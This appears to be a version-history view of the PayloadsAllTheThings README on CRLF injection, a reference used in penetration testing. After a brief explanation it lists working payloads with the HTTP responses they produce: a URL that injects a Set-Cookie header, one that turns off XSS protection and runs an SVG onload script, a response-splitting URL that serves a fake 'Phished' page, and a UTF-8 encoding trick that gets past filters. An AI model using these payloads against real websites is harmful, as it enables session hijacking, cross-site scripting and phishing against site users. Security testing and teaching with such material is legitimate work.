PayloadsAllTheThings/CRLF Injection/README.md

121 lines
3.2 KiB
Markdown
Raw Normal View History

2022-10-12 10:13:55 +00:00
# Carriage Return Line Feed
2018-08-12 21:30:22 +00:00
2022-10-12 10:13:55 +00:00
> The term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). They're used to note the termination of a line, however, dealt with differently in todays popular Operating Systems. For example: in Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line.
2016-10-18 08:01:56 +00:00
2022-10-12 10:13:55 +00:00
> A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.
2019-12-17 16:42:35 +00:00
2024-11-04 17:00:07 +00:00
2019-12-17 16:42:35 +00:00
## Summary
2024-11-04 17:00:07 +00:00
- [Add a cookie](#add-a-cookie)
- [Add a cookie - XSS Bypass](#add-a-cookie---xss-bypass)
- [Write HTML](#write-html)
- [Filter Bypass](#filter-bypass)
- [Labs](#labs)
2019-12-17 16:42:35 +00:00
- [References](#references)
2016-10-18 08:01:56 +00:00
2024-11-04 17:00:07 +00:00
## Add a cookie
2018-08-12 21:30:22 +00:00
2016-10-18 08:15:43 +00:00
Requested page
2018-08-12 21:30:22 +00:00
2020-10-25 10:07:50 +00:00
```http
2016-10-18 08:15:43 +00:00
http://www.example.net/%0D%0ASet-Cookie:mycookie=myvalue
2016-10-18 08:01:56 +00:00
```
2017-05-29 18:41:05 +00:00
HTTP Response
2018-08-12 21:30:22 +00:00
2020-10-25 10:07:50 +00:00
```http
2016-10-18 08:15:43 +00:00
Connection: keep-alive
Content-Length: 178
Content-Type: text/html
Date: Mon, 09 May 2016 14:47:29 GMT
2017-05-29 18:41:05 +00:00
Location: https://www.example.net/[INJECTION STARTS HERE]
2016-10-18 08:15:43 +00:00
Set-Cookie: mycookie=myvalue
X-Frame-Options: SAMEORIGIN
X-Sucuri-ID: 15016
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
```
2024-11-04 17:00:07 +00:00
## Add a cookie - XSS Bypass
2018-08-12 21:30:22 +00:00
2017-05-29 18:41:05 +00:00
Requested page
2018-08-12 21:30:22 +00:00
```powershell
2017-05-29 18:41:05 +00:00
http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e
```
2018-08-12 21:30:22 +00:00
2017-05-29 18:41:05 +00:00
HTTP Response
2018-08-12 21:30:22 +00:00
2020-10-25 10:07:50 +00:00
```http
2017-05-29 18:41:05 +00:00
HTTP/1.1 200 OK
Date: Tue, 20 Dec 2016 14:34:03 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 22907
Connection: close
X-Frame-Options: SAMEORIGIN
Last-Modified: Tue, 20 Dec 2016 11:50:50 GMT
ETag: "842fe-597b-54415a5c97a80"
Vary: Accept-Encoding
X-UA-Compatible: IE=edge
Server: NetDNA-cache/2.2
Link: <https://example.com/[INJECTION STARTS HERE]
Content-Length:35
X-XSS-Protection:0
23
<svg onload=alert(document.domain)>
0
```
2024-11-04 17:00:07 +00:00
## Write HTML
2018-08-12 21:30:22 +00:00
2016-10-18 08:15:43 +00:00
Requested page
2018-08-12 21:30:22 +00:00
2020-10-25 10:07:50 +00:00
```http
http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E
2016-10-18 08:15:43 +00:00
```
HTTP response
2018-08-12 21:30:22 +00:00
2020-10-25 10:07:50 +00:00
```http
2016-10-18 08:15:43 +00:00
Set-Cookie:en
Content-Length: 0
2017-05-29 18:41:05 +00:00
2016-10-18 08:15:43 +00:00
HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 27 Oct 2060 14:50:18 GMT
Content-Length: 34
2017-05-29 18:41:05 +00:00
<html>You have been Phished</html>
```
2024-11-04 17:00:07 +00:00
## Filter Bypass
2018-08-12 21:30:22 +00:00
Using UTF-8 encoding
2018-08-12 21:30:22 +00:00
2020-10-25 10:07:50 +00:00
```http
%E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE
```
2018-08-12 21:30:22 +00:00
Remainder:
2018-08-12 21:30:22 +00:00
2024-11-04 17:00:07 +00:00
* `%E5%98%8A` = `%0A` = \u560a
* `%E5%98%8D` = `%0D` = \u560d
* `%E5%98%BE` = `%3E` = \u563e (>)
* `%E5%98%BC` = `%3C` = \u563c (<)
2022-10-01 19:56:49 +00:00
## Labs
2024-11-04 17:00:07 +00:00
* [Lab: HTTP/2 request splitting via CRLF injection - PortSwigger](https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection)
2020-10-25 10:07:50 +00:00
2018-12-24 14:02:50 +00:00
## References
2018-08-12 21:30:22 +00:00
2024-11-04 17:00:07 +00:00
- [CRLF Injection - CWE-93 - OWASP - May 20, 2022](https://www.owasp.org/index.php/CRLF_Injection)
- [Starbucks: [newscdn.starbucks.com] CRLF Injection, XSS - Bobrov - 2016-12-20](https://vulners.com/hackerone/H1:192749)